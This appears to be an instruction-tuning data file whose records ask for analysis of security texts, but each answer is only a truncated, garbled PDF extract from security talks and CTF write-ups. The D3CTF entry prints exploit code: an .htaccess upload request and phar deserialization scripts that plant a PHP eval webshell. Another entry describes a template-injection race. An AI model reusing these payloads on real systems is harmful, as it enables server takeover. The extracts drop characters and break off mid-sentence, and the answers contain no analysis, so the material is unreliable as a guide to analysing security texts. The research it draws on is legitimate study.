http://dtic.mil/dtic/tr/fulltext/u2/a592724.pdf PUBLIC 7 THREAT HUNTING (威脅獵捕)  work inside the Army enterprise to actively search (專注內部主動搜索)  locate threats that have penetrated the Army enterprise (偵測已經侵入 的威脅)  bypassed the primary avenues of approach monitored by automated systems (逃避自動式的偵測系統) PUBLIC PEOPLE, PROCESS, TECHNOLOGY.. AGAIN?! PUBLIC  Assume breach mind-set  Go beyond the technology  Offensive or/and Defensive knowledge (Incident Response, Penetration Tester, SOC, Sys Admin etc) 9 PEOPLE  Not reserved for Level 3 or the best  Research / Innovation Time  Use Case / Hypothesis Generation  Threat Hunting 101  Become The Hunter PUBLIC  Senior Management (CIO/C", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n一枚字体CRASH到FUZZING的探索 目录 CONTENTS 1fuzzing的介绍 2fuzzing这么好玩就crash了 3进阶apple 字体处理框架的fuzzing 4升级fuzzing的探索与改造 5继续fuzzing收获漏洞 0 1 PART 01 0 2 fuzzing的介绍 介绍 0 1 2020是个非常奇妙与难忘的一年同样fuzzing技术在2020年技术井喷涌现了一大批fuzzing工具和前沿的 研究 在2020年的年终时候我在知乎上对2020年的开源fuzzing做了一些总结与些许研究一个开源的研究与项 目叫FormatFuzzer这个项目的出现让我想起了aflsmart的开源fuzzing项目两者都是类似的文本结构 fuzzing和aflsmart不同的是FormatFuzzer项目还处于开发阶段 通过我对aflsmart fuzzing项目的熟悉我决定以Formartfuzzer为契机来玩一下 https://zhuanlan.zhihu.com/p/344008210 Formartfuzzer 0 1 Formartfuzzer项目地址 https://uds-se.github.io/FormatFuzzer/ PART 02 0 2 fuzzing这么好玩就 crash了 Formartfuzzer 0 1 Formartfuzzer生成器 13种格式 Formartfuzzer 010 Editor bt模 板改 PNG GIF ........ AVI BMP 增加ttf bt 模板 ffcompile 编译器 生成 畸形 数据 ttf结构 0 1 19个table表必须出现在任何有效的 TrueType 字体文件中 2这些表可以按任何顺序出现 330多个特殊的表 010 Editor ttf字体结构name视图 0 1 TTF 010 BT模板的改造 21 table的改写 0 1 pfp解 释器 010 editor的 bt模板 改造 ttf模板生成 器 字体fuzzing目标的选定 0 1 macos ? /System/Applications/Font Book.app/Contents/MacOS/Font Book ttf模板生成器生成畸形字体 通过Font Book打开 0 1 fuzzing start ? 条件 0 1 1自动启动和关闭 2产生畸形数据 3可以检测crash与保存crash fuzzing脚本 0 1 #/bin/bash for I in {1..200000};do ./ttf-fuzzer fuzz test.ttf sleep 1s ./test test.ttf & echo \"sleep start\\n\" sleep 1s echo \"kill start\\n\" ps -efww|grep -w 'Font'|grep -v grep|cut -c 7-17|xargs kill -9 done echo \"over\\n\" exit 0 ttf字体 生成器 启动font book crash检测保 存 0 1 经过24小时的fuzzing..... fuzzing这么好玩就crash了 crash 字体分析 0 1 1head.unitsPerEm = 0 设置为 16 到 16384 之间的值此范围内 的任何值均有效 2name.nameID = 1(字体系列) 以上设字体参数设置将会导致font book参数 异常而引发崩溃 fuzzing这么好玩就crash了 0 1 加入Formartfuzzer 自带变异算法如 smart_replacesmart_deletesmart_insert smart_abstractsmart_swap重新启用脚本fuzzing 等待数天.jpg 2 x 24h fuzzing测试后...... 0 crash..... 0 1 思考 0 1 1对于字体特殊的table组成随机剪切替换会引发很多无 效的数据 2没有有效的反馈做了无用功 3是不是该做点fuzzing进阶了 比如apple字体框架是如何解析的加入程序路径覆盖率反 馈等 PART 03 0 2 进阶apple 字体处理框 架的fuzzing apple 字体处理框架 0 1 Core Text 是一种用于布局文本和处理字体的高级低等级技术Core Text 直接与 Core Graphics (CG) 一起工 作也称为 Quartz它是一种高速图形渲染引擎可在 OS X 和 iOS 的最低级别处理二维图像 CoreText框架 0 1 基础框架 CTFrameSetter相当于一个CTFrame工厂来生产CTFrame一个界面上可以有多", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHackers + Airplanes No Good Can Come Of This Defcon 20 Brad RenderMan Haines, CISSP www.renderlab.net render@renderlab.net Twitter: @IhackedWhat + = Who Am I? Who Am I? Consultant  Wireless, Physical, General Security, CISSP Author  7 Deadliest Wireless Attacks, Kismet Hacking, RFID Security Trainer  Wireless and Physical security Who Am I? Hacker  Renderlab.net Hacker Group Member  Church of Wifi, NMRC Defcon Old Timer  Every year since DC7 Consultant  Wireless, Physical, General Security, CISSP Author  7 Deadliest Wireless Attacks, Kismet Hacking, RFID Security Trainer  Wireless and Physical security Who Am I? First, The Kaminsky Problem  At multiple cons, over multiple years, speaking in opposite rooms  Getting rather ridiculous  I have yet to see any of his talks live  Summed up as the RenderMan Birthday Paradox on his blog  Ironic since yesterday (27th) was my birthday  Can someone confirm if they are schedualing this intentionally! Ass Covering  For the love of Spongebob, do not actually try any of the ideas in this talk outside of a lab!!!  We are talking about commercial airliners and peoples lives here; serious stuff  Use this information to make air travel safer  Think about how this happened and make sure future systems are built secure from the start  Hackers need to be included in more areas than we are now Ass Covering  I Want To Be Wrong!; If I am wrong about something, call me on it, publicly!  I am not a pilot, ATC operator, or in any way associated with the airline industry or aviation beyond flying cattle class. A Lot!  I may have some details or acronyms wrong, I apologize, feel free to correct me  This research is ongoing and too important to keep hidden until completion  I want to prove to myself this is safe, so far I've failed, so I need your help It All Started With An App  I got interested purely by accident  Bought Planefinder AR in October 2010  Overlays flight information through camera  GPS location + Direction + web lookup of flights  ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nJS逆向 | WebPack站点实战 收录于合集 #JS逆向 4个 章配套B站视频很多话语简略了建议配着视频看 地址https://www.bilibili.com/video/BV13F411P7XB/ 开始之前了简单过下下个法加深印象便于更好理解加载器也可以直接从 webpack标题开始看起 Function/函数/法 常规的js函数命名法 //1. 常规function var test = function(){ console.log(123); } function test(){ console.log(2); } 今天的主执函数 //2. 执function !function(){ console.log(1); }() きっとまたいつか Depapepe 2022-08-07 09:46 发表于北京 原创 不愿透露姓名的热友 位不愿透露姓名的热友 }() // => function a(){} a() //2.1 !function(e){ console.log(e) var n={ t:\"txt\", exports:{}, n:function(){console.log(\"function n \")} } }(\"echo this\") //2.2 !function(e){ console.log(e) var n={ t:\"txt\", exports:{}, n:function(){console.log(\"function n \")}} }( { \"test\":function(){ console.log(\"test\")} } ) //([\"test\":function(){console.log]) call/apply Function [Fcuntion prototype call and applay ](Function.prototype.call() - JavaScript | MDN (mozilla.org)) 允许为不同的对象分配和调属于另个对象的函数/法 call和apply的使效果基本致可以让A对象调B对象的法 让 Vx 对象调 _x 对象的 say() 法 var Vx={ name:\"位不愿透露姓名的热友\", age:\"18cm\" }; var _x={ name:\"热友\", age:\"18mm\", say:function(){console.log(\"name:\"+this.name+\" age:\"+this.age)} } _x.say.call(Vx) //name:位不愿透露姓名的热友 age:18cm Webpack webpack 个静态模块打包器有出loader 和插件通过loader加载器对js css图件等资源进加载渲染 实战站点https://spa2.scrape.center/ WebPack 站点什么样 法1. 右键查看源码发现只会有js链接件没有其他多余的前端信息f12看元素就会有 很多数据 法2. 看Js件般会有个app.xxxx.js或得像MD5的件名然后js内容有很多ab cdn...的变量来回调反正就是看着乱 loader加载器 Webpack站点与普通站点的JS代码扣取是不样的因为Webpack站点的资源加载是围绕着加 载器进的然后把静态资源当作模块传调传的模块就是参数需要加载什么就运 什么模块 先简单看下加载器相 !function(e){ var t={} function d(n){ if (t[n]) return t[n].exports; console.log(n) var r = t[n] = { i:n, l:!1, exports:{} }; return e[n].call(r.exports,r,r.exports,d), r.l = !0; r.exports } d(1) }( [ function(){console.log(\"function1\");console.log(this.r.i)}, function(){console.log(\"function2\")} ] ); 加载器分析 将加载器拆分为两部分 函数法部分 !function(e){ var t={} function d(n){ if (t[n]) return t[n].exports; var r = t[n] = { i:n, l:!1, exports:{} }; return e[n].call(r.exports,r,r.exports,d), r.l = !0; r.exports } d(1) 参数部分 ( [ function(){console.log(\"function1\");console.log", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nKoalrの沉思录 Posts About xray 终极反制实践 November 26, 2021 阅读时间9 分钟 xray 得益于 Go 语言本身的优势没有那么多不安全的动态特性唯一动态是一个表达式引擎 CEL)用的时候也加了各种类型校验和静态代码没有什么区别了因此基本不可能实现 RCE 之类的反制效果那么我们换个思路有没有办法让 xray 直接无法使用呢 无法使用有两个表现一个是让其直接崩溃掉效果就是如果用 xray 扫描一个恶意 server xray 直接 panic 退出xray 0.x.x 之前的某些版本确实有这种 bug我当时耗费了很大的精力去 这个定位问题然后开心的修掉了这里就不细说这个点了因为版本太老说了也没有太大意义 另一方面呢想想之前比较热门的 CobaltStrike 反制做法是设法取得 CS 的通信密钥然后模拟 其上线流量Server 端会瞬间上线无数机器使得 CS 无法正常使用那么我们能否给 xray 喂 屎使得它能瞬间扫出无数漏洞来让正常的扫描失效呢我顺着这个思路做了一些探索这篇文 章就来说下我在编写这样一个反制工具的过程中遇到的困难以及我是如何解决的 入手 想让扫描器能扫出漏洞只需要满足扫描器对一个漏洞的规则定义即可xray 的 poc 部分是开源 的意味着我们可以知道 xray 在扫描时是怎么发的包以及什么样的响应会被定义为漏洞存在 那么我们只要能定义一个 server 让 server 按照 poc 中定义的的响应去返回数据就可以欺骗 xray 让其认为漏洞存在看一个最简单的例子 1 2 3 4 5 6 7 rules: r0: request: method: GET path: /app/kibana expression: response.status == 200 && response.body.bcontains(b\".kibanaWelcomeVie expression: r0() 在这个例子中只要让 /app/kibana 这个路由返回.kibanaWelcomeView 并且状态码是 200就能 扫出 poc-yaml-kibana-unauth 这个漏洞这太简单了我们只需要批量解析一下所有 poc然后 基于规则构建一下返回的数据就可以了事实的确如此不过过程可能稍显曲折来看下另一个 例子 1 2 3 set: rand1: randomLowercase(10) rules: 4 5 6 7 8 9 10 11 12 13 14 15 16 17 r0: request: method: GET path: /enc?md5={{rand1}} expression: response.body.bcontains(bytes(md5(rand1))) output: search: 'test_yarx_(?P<group_id>\\w+)\".bsubmatch(response.body)' group_id: search[\"group_id\"] r1: request: method: GET path: /groups/{{group_id}} expression: response.headers[\"Set-Cookie\"].contains(group_id, 0, 8) expression: r0() && r1() 这个例子复杂了亿点其复杂性主要来自于这几方面 1. 整体存在两条规则 r0() && r1() 且两条规则都满足才行 2. path 中存在变量无法直接将 path 作为路由使用 3. 第二条规则的 group_id来自于第一条规则的响应进行匹配得到的值即两条规则存在联系 4. 对响应的判断没有使用常量而是需要将变量经过部分运算后返回给扫描器才有效 可能有同学会问实际的 poc 真有这么复杂吗答案是有过之而无不及这种逻辑复杂还有层级 关系的 poc 极大的阻碍了我们上面一把梭的想法我们需要重新整理一下思路寻找一下破局的 方法 破局 yaml poc 中的 expression 部分用于漏洞存在性判断它是一条规则在执行过程最终的终点从 这里出发去寻找解决方案是一个不错的思路 expression 部分是由 CEL 标准定义的表达式下 面这些形式都是合法且常见的 1 2 3 reponse.status != 201 response.header[\"token\"] == \"lwq\" reponse.body.bcontains(bytes(md5(\"yarx\"))) 需要反连的漏洞先不谈宏观来讲一个响应我们可以控制的点只有4个 状态码 响应头 响应体 响应时间 最后一个一般用于盲注检测的指标也暂时不看其余三个就可以涵盖绝大部分的 ya", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nOpt Out or Deauth Trying ! Anti-Tracking Bots Radios and Keystroke Injection Weston Hecker Principal Application Security Engineer NCR Twitter @Westonhecker A Little About Me.  About myself: 32 - Work for NCR - Live in North Dakota  Defcon 22, 23, 24 and 25 Blackhat 2016, Hardwear.io, ICS security 2016, Enterprise Connect 2016, ISC2-Security Congress, SC-Congress Toronto, BSIDESBoston, HOPE 11 (50+ other talks)  12 years Pentesting has 13 years of Experience Doing Security Research and Programming.  Hacking ATMs, POS, Hotel, Cars and Several IOT projects.  Reverse Engineering Malware  Building Hardware  Car Hacking Village/Demolabs talk (2FA for 11 dollars) TPMS (Early Warrant detection POC) Present background: About This Research.  What lead to this research ?  Chemtrails.  EOL Windows 7 Present background: About This Research.  Explain systems that have been used in the past  Where the instore tracking is going.  Operating systems spying (Switching to Windows 10)  Search engines spying (Google,Yahoo) Bing Probably Does to But No One Uses It?  Billboards spying  Creepy ADs  Privacy disappearing Explanation of Targeted/Personalized Advertising/Uses of targeted advertising.  What is targeted advertising.  Personalized advertising  Behavioral Advertising and cookies.  Hobbies music automobiles electronics travel ETC  Collection of non identifiable information. Most of the time no email name or address added information to audience interest cookies  Jacks up RTB Real time bid information making it useless or undesirable range.  Programmatic software for advertisement displays.  Private Market Place. PMP money waisted Explanation of online tracking.  Explanation of technology tracking online.  Expansion of operating systems spying  How impacts users  How impacts businesses  Pages tracked for ad  Pages other forms of tracking  GPS Tracking IP address  Wifi Beacons and cellular towers. Topics Used for Personalized Ads.  Arts and Entertainment, Autos and Vehicles, Beauty a", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### Crypto攻击模式概述 在我们攻击一个密码学系统时我们或多或少会得到关于这个系统的一些信息根据得到信息量的不同我们可以采用的方法就可能不同在当今的密码学分析时一般我们都会假设攻击者知道密码学算法这个假设是合理的因为历史上有很多保密的算法最后都被人所知比如 RC4被知道的方式多重多样比如间谍逆向工程等 这里我们根据攻击者获取密码学系统的信息的多少将攻击模式分为以下几类 - **唯密文攻击**攻击者仅能获得一些加密过的密文 - **已知明文攻击**攻击者有一些密文对应的明文 - **选择明文攻击**攻击者在开始攻击时可以选择一些明文并获取加密后的密文如果攻击者在攻击中途可以根据已经获取的信息选择新的明文并获取对应的密文则称为适应性选择明文攻击 - **选择密文攻击**攻击者在开始攻击之前可以选择一些密文并获取解密后的明文如果攻击者在攻击图中可以根据已经获取的信息选择一些新的密文并获取对应的明文则称为适应性选择密文攻击 - **相关密钥攻击**攻击者可以获得两个或多个相关密钥的加密或解密后的密文或明文但是攻击者不知道这些密钥 ### Crypto常见攻击方法 根据不同的攻击模式可能会有不同的攻击方法目前常见的攻击方法主要有 - 暴力攻击 - 中间相遇攻击 - 线性分析 - 差分分析 - 不可能差分分析 - 积分分析 - 代数分析 - 相关密钥攻击 - 侧信道攻击", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Sha4 (web, 300pts, 16 solves) > tl;dr > local file read, race condition, hash collision, template injection ![scr1](scr1.png) Start off by noticing that we have a local file read via the second form: ![scr2](scr2.png) Lets find out where the application root is: `etc/apache2/sites-enabled/000-default.conf` ``` <VirtualHost *:80> ServerName sha4 WSGIDaemonProcess sha4 user=www-data group=www-data threads=8 request-timeout=10 WSGIScriptAlias / /var/www/sha4/sha4.wsgi <directory /var/www/sha4> WSGIProcessGroup sha4 WSGIApplicationGroup %{GLOBAL} WSGIScriptReloading On Order deny,allow Allow from all </directory> ErrorLog ${APACHE_LOG_DIR}/error.log CustomLog ${APACHE_LOG_DIR}/access.log combined </VirtualHost> ``` Great! [file:////var/www/sha4/server.py](server.py) [file:////var/www/sha4/sha4.py](sha4.py) ``` python out_text = str(decode(ber)) open(f, \"w\").write(out_text) if is_unsafe(out_text): return render_template_string(unsafe) commentt = comment % open(f).read() return render_template_string(commentt, comment=out_text.replace(\"\\n\",\"<br/>\")) ``` Is vulnerable to race condition and template injection. We can first send a valid input that passes the `is_unsafe` check and then a malicious input that injects the template. The contents of the file will be overwritten for the first execution so it will actually evaluate the malicious payload. But in order to do that we need 2 different inputs that produce the same `hash`: ``` python def hash(x): h0 = \"SHA4_IS_\" h1 = \"DA_BEST!\" keys = unpad(x) for key in keys: h0 = DES.new(key).encrypt(h0) h1 = DES.new(key).encrypt(h1) return h0+h1 ``` `unpad` function works as expected, it takes 7 8-bit bytes and output 8 7-bit bytes, pic rel: ![scr3](scr3.png) DES.encrypt was the problem. DES, although takes 8 bytes as key, is not using all 64 bits, but only 56. It ignores lsb of each byte. This means we can actually get identical encryption results as long as the key differs only on lsb. So we could perform bitflips to bypass the wh", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1\" Breaking WingOS Josep Pi Rodriguez Senior Security Consultant Josep.rodriguez@ioactive.com IOActive, Inc. Copyright 2018. All Rights Reserved. Agenda  Intro to WingOS  Scenarios & Attack surface  Vulnerabilities  Exploitation & Demo  Conclusions IOActive, Inc. Copyright 2018. All Rights Reserved. Intro to WingOS  Embedded Linux OS with proprietary modifications in Kernel  Created by Motorola. Now property of Extreme networks  Architecture Mips N32  Used mainly in Wireless AP and Controllers  No public information or previous research about its internals IOActive, Inc. Copyright 2018. All Rights Reserved. Intro to WingOS IOActive, Inc. Copyright 2018. All Rights Reserved. Intro to WingOS  Web interface. IOActive, Inc. Copyright 2018. All Rights Reserved. Intro to WingOS  CLI. IOActive, Inc. Copyright 2018. All Rights Reserved. Intro to WingOS  Devices using WingOS (Extreme networks): IOActive, Inc. Copyright 2018. All Rights Reserved. Intro to WingOS  Devices using WingOS:  Motorola devices and Zebra devices IOActive, Inc. Copyright 2018. All Rights Reserved. Intro to WingOS  Devices using WingOS: IOActive, Inc. Copyright 2018. All Rights Reserved. Intro to WingOS  Devices using WingOS (Kontron for aircrafts): IOActive, Inc. Copyright 2018. All Rights Reserved. Intro to WingOS  Where you can find these devices? - Widely used in aircrafts by many airlines around the world IOActive, Inc. Copyright 2018. All Rights Reserved. Intro to WingOS https://techworld.idg.se/2.2524/1.644569/wifi-flygplan/sida/2/sida-2 IOActive, Inc. Copyright 2018. All Rights Reserved. Intro to WingOS EN website and case studies you can see that these devices are used in: - Smart buildings and Smart cities - Healthcare - Government - Small and big enterprise networks - Education - Retail, Stadiums -  IOActive, Inc. Copyright 2018. All Rights Reserved. https://transitwireless.com/wp-content/uploads/2016/04/Motorola-Case-Study-New-York-City-Transit.pdf IOActive, Inc. Copyright 2018. All Rights R", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nNail the Coffin Shut: Kurt Grutzmacher - Defcon 16 grutz @ jingojango.net NTLM IS DEAD grutz @ jingojango.net NTLM is DEAD! grutz @ jingojango.net NTLM is DEAD! Slide # Who I am... Corporate Penetration Tester for nearly a decade (with a CISSP for business purposes, gotta do what ya gotta do) Have seen the worst security get turned around into lil better security As the Enterprise learned how to protect themselves we had to figure out other ways to attack This presentation is a culmination of this knowledge Also dabble in Metasploit development, getting Free MacWorld passes, and spreading the good word of OWASP 2 grutz @ jingojango.net NTLM is DEAD! grutz @ jingojango.net NTLM is DEAD! Slide # Quick Definitions LM - LAN Manager Really old and really tired, never use this again Finally disabled by default in Vista and Server 2008 NTLM - NT LAN Manager Replaced LAN Manager (for a good reason) A suite of protocols for authentication and security: NTLM Security Support Provider (NTLMSSP) Also known as ntlm 0.12 Describes an authentication protocol and the hash result Kerberos - Kerberos But not just Kerberos, Microsoft extended Kerberos! 3 grutz @ jingojango.net NTLM is DEAD! grutz @ jingojango.net NTLM is DEAD! Slide # Scrabble take two Nonce - Number Used Once Used to defeat replay attacks SSPI - Security Support Provider Interface Microsoft API to several security routines SPNEGO - Simple and Protected GSSAPI Negotiation Mechanism I dont know what to speak to you, so lets negotiate! IWA - Integrated Windows Authentication The act of negotiating authentication type using SPNEGO 4 grutz @ jingojango.net NTLM is DEAD! grutz @ jingojango.net NTLM is DEAD! Slide # Windows Type Auth NTLM Authentication Protocol is a challenge-response scheme that can be broken into three Types: Type 1: Client sends Hi, I want to talk to you Type 2: Server sends Ok, heres the various features and protocols I support including a nonce for you to encrypt your hashes with so nobody can replay i", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nNational Security Agency Cybersecurity and Infrastructure Security Agency Cybersecurity Technical Report Kubernetes Hardening Guidance August 2021 S/N U/OO/168286-21 PP-21-1104 Version 1.0 U/OO/168286-21 | PP-21-1104 | August 2021 Ver. 1.0 ii National Security Agency Cybersecurity and Infrastructure Security Agency Kubernetes Hardening Guidance National Security Agency Notices and history Document change history Date Version Description August 2021 1.0 Initial release Disclaimer of warranties and endorsement The information and opinions contained in this document are provided \"as is\" and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not necessarily constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes. Trademark recognition Kubernetes is a registered trademark of The Linux Foundation.  SELinux is a registered trademark of the National Security Agency.  AppArmor is a registered trademark of SUSE LLC.  Windows and Hyper-V are registered trademarks of Microsoft Corporation.  ETCD is a registered trademark of CoreOS, Inc.  Syslog-ng is a registered trademark of One Identity Software International Designated Activity Company.  Prometheus is a registered trademark of The Linux Foundation.  Grafana is a registered trademark of Raintank, Inc. dba Grafana Labs  Elasticsearch and ELK Stack are registered trademarks of Elasticsearch B.V. Copyright recognition Information, examples, and figures in this document are based on Kubernetes Documentation by The Kubernetes Authors, published under a Creative Commons Attribution 4.0 license. U/OO/168286-21 | PP-21-1104 | August 2021 Ver. 1.0 iii National Security Agency Cybersecurity and Infrastructure Security Agency Kubernetes Hardening Guidance National Security Agency Publication inf", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nJennifer Stisa Granick, Esq. Exec. Director, Center for Internet & Society Stanford Law School Stanford, California USA http://cyberlaw.stanford.edu Black Hat Briefings 2007 Intellectual Property Law and Vulnerability Reporting Cisco and ISS v. Lynn (2005)  http://www.granick.com/blog/  http://www.wired.com/science/discoveri es/news/2005/08/68435  Complaint included:  Copyright Infringement  Misappropriation of Trade Secrets  Breach of Contract HID v. IOActive (2007)  http://www.granick.com/blog/?p=552  http://www.wired.com/politics/law/comm entary/circuitcourt/2007/02/72819  Letter suggested patent misuse/infringement Topics for the Talk  Copyright Infringement, Reverse Engineering and Fair Use  Trade Secrets, EULAs and TOS  Patent Infringement  Free Speech and Vulnerability Reporting CR Infringement & Lynn ISS Slides Cisco Code Copyright Infringement  protects software  owner has exclusive rights in the work, even when copies of the item are given away or sold  the right to reproduce the work; the right to prepare derivative works; the right to distribute copies of the work; the right to perform the work publicly; and the right to display the work publicly. Program Mods  Owner of a copy of a computer program is allowed to reproduce or adapt the program if reproduction or adaptation is necessary for the program to be used in conjunction with a machine. (17 U.S.C. 117) Reverse Engineering  Protected by Fair Use  The purpose and character of the use, including whether such use is of commercial nature or is for nonprofit educational purposes;  The nature of the copyrighted work;  Amount and substantiality of the portion used in relation to the copyrighted work as a whole; and,  The effect of the use upon the potential market for or value of the copyrighted work. Reverse Engineering  If reverse engineering is required to gain access to function and ideas, any intermediate copies made as part of reverse engineering are fair use.  RE will not protect you from a copyright", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nD3CTF Writeup 1 D3CTF Writeup Author:Nu1L Web ezupload 先写htaccess让他可以执脚本 POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=--------------------------030808716877952631606047 User-Agent: PostmanRuntime/7.20.1 Accept: */* Cache-Control: no-cache Postman-Token: aeee478c-f649-433f-b007-6799bb3db9f2 Host: cdc673a649.ezupload.d3ctf.io Accept-Encoding: gzip, deflate Content-Length: 443 Connection: close ----------------------------030808716877952631606047 Content-Disposition: form-data; name=\"action\" upload ----------------------------030808716877952631606047 Content-Disposition: form-data; name=\"url\" data:image/png;base64,QWRkSGFuZGxlciBwaHA3LXNjcmlwdCAudHh0 ----------------------------030808716877952631606047 Content-Disposition: form-data; name=\"filename\" .htaccess ----------------------------030808716877952631606047-- 再反序列化往件写jio本 先找录 <?php $d1 = new dir(\"test\", \"testdd\"); $d1->userdir = '../'; $d2 = new dir(\"url\", \"filename\"); $d2->filename = \"upload/3535fc06ad2b768f8f2f752376f94f14/test3\"; $d2->userdir = $d1; // echo serialize($d2); $phar = new Phar(\"1.phar\"); $phar->startBuffering(); $phar->setStub(\"GIF89a\".\" __HALT_COMPILER(); \"); // 增加gif件头 $phar->setMetadata($d2); Web ezupload ezts easyweb fake onelinephp Showhub Pwn knote unprintableV new_heap RE Ancient Game V2 Crypto babyecc sign2win D3CTF Writeup 2 $phar->addFromString(\"test.jpg\",\"test\"); $phar->stopBuffering(); 这为了绕过内容检测, 把phar压缩(gzip)了下 触发 然后再写个脚本, 写txt, 放webshell, 还是为了绕过检测, 压缩了下 <?php $d3 = new dir(\"test\", \"testdd\"); $d3->userdir = '<?php eval($_REQUEST[122]); phpinfo();'; $d3->filename = '/var/www/html/a57ecd54d4df7d99/upload/3535fc06ad2b768f8f2f752376f94f14/test3'; $phar = new Phar(\"2.phar\"); $phar->startBuffering(); $phar->setStub(\"GIF89a\".\" __HALT_COMPILER(); \"); D3CTF Writeup 3 // 增加gif件头 $phar->setMetadata($d3); $phar->addFromString(\"test.jpg\",\"test\"); $phar->stopBuffering(); phpinfo 发现 open_basedir=/var/www/html 绕过+查看 = get flag ini_set('open_basedir', '..'); chdir('..'); chdir('..'); chdi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nClick Fraud Detection using Practical Memetics Defcon 15, Aug 3-5, 2007 Broward Horne http://www.realmeme.com Overview  Advertising Click Fraud  Botnets (Agents Of Click Fraud)  S-Curve  Original Meme Theory (Dawkins)  Empirical Meme Theory (Me! Ho!)  Expanded Meme Mining Model  MySpace Example  IAFF.com Example  Meme Seepage Theory  Botnet Proof  Gaming Conjectures  Extrapolations Click Fraud - Definition From Wikipedia - When a person, script or computer program imitates a legitimate user to generate a charge per click of an advertised product Is Click Fraud relatively unknown? Poll Google Adsense Model  www.google.com/adsense  Click fraud risk Botnets  From Wikipedia- a collection of compromised computers (zombies) running under a common command-and-control infrastructure S-Curve (Physical Model) S-Curve (Math Model) S-Curve Rate-Of-Change S-Curve Strategy Dawkins Meme Theory  Dawkins coined the term meme in 1976  An idea like I want a tattoo  Wikipedia definition - a unit of cultural information that propagates from one mind to another as a theoretical unit of cultural evolution Ideosphere  The sum of all memes in circulation  The Global Human Consciousness  The Internet has a subset of the Ideosphere Empirical Meme Theory (Me!)  Original Meme Theory  Keywords As Proxy For A Meme  Electron Flow ( E = I x R ) (Networks)  S-Curve  Meme Miner ( Dejanews.com )  Google Trends tool  Blogpulse.com Example: Delphi Example: Easter Bunny Example: Sex & Terrorism Meme Assumptions  Memes propagate as an S-Curve  Memes propagate to most sites but at different amplitudes and latencies Meme Miner Inadequacies  Single source  Dejanews.com indexing revised by Google  Older technology losing favor Expanded Mining Model First tested on MySpace meme MySpace Meme (Dejanews) MySpace Meme (Alexa) MySpace Meme (Google) The New Model Worked For the MySpace meme, so I tested it against another case, a new site with a high growth rate IAmFacingForeclosure.com (IAFF.com) But the results we", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nOffensive Windows IPC Internals 1: Named Pipes Contents: Introduction Named Pipe Messaging Data Transfer Modes Overlapping Pipe I/O, Blocking mode & In-/Out Buffers Named Pipe Security Impersonation Impersonating a Named Pipe Client Attack Surface Client Impersonation Attack scenario Prerequisites Misleading Documentation Implementation Instance Creation Race Condition Attack scenario Prerequisites Implementation Instance Creation Special Flavors Unanswered Pipe Connections Killing Pipe Servers PeekNamedPipe Prerequisites Implementation References The Series: Part 2 Introduction This post marks the start of a series of posts about the internals and interesting bits of various Windows based Inter-Process-Communication (IPC) technology components. Initially this series will cover the following topics: Named Pipes LPC ALPC RPC A few IPC technology components are therefore left out, but I might append this series sometime and include for example some of these: Window Messages DDE (which is based on Window Messages) Windows Sockets Mail Slots Alright so lets get down to it with Named Pipes Although the name might sound a bit odd pipes are a very basic and simple technology to enable communication and share data between two processes, where the term pipe simply describes a section of shared memory used by these two processes. To term this correctly right from the beginning, the IPC technology were speaking about is called pipes and there are two types of pipes: Named Pipes Anonymous Pipes Most of the time when speaking about pipes youre likely referring to Named Pipes as these offer the full feature set, where anonymous pipes are mostly used for child-parent communications. This also implies: Pipe communication can be between two processes on the same system (with named and anonymous pipes), but can also be made across machine boundaries (only named pipes can talk across machine boundaries). As Named Pipes are most relevant and support the full feature set, this post will", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nExploiting Continuous Integration (CI) and Automated Build Systems And introducing CIDER Whoami  SpaceB0x  Sr.+Security+Engineer+at+LeanKit  Application+and+network+security+(offense+and+defense)  I+like+breaking+in+to+systems,+building+systems,+and+learning  Security+consultant ./agenda.sh  Overview+of+Continuous+Integration+concepts  Tools+  Build+Chain+and+Configuration+problems  Real+world+exploit+#1+  Common+deployment+bad-practices  Real+world+exploit+#2+ Attacking+the+CI+provider  Introduce+CIDER Continuous1Integration1 Continuous1Integration1(CI)  Quick+iterative+release+of+code+to+production+servers  Goal:+Many+deployment+iterations+per+day+or+week  Tend+to+be+repository+centric  In+sync+with+Automated+Build+chains  For+infrastructure/servers/subnets+as+well+as+code+ Microservices  Just+abstraction  Breaking+down+large+app+into+small+decoupled+components  Do+1+or+2+things+really+well  Developed+Autonomously+ Security1Implications  Good+- Frequent+release+cycles+are+fabulous!  Good+- Faster+code+deployments+=+quick+remediation  Good+ Reduced+single+points+of+failure  Good+- Compromise+of+one+service+doesnt+(always)+mean+full+pwnage Security1Implications  Good+- Frequent+release+cycles+are+fabulous!  Good+- Faster+code+deployments+=+quick+remediation  Good+- 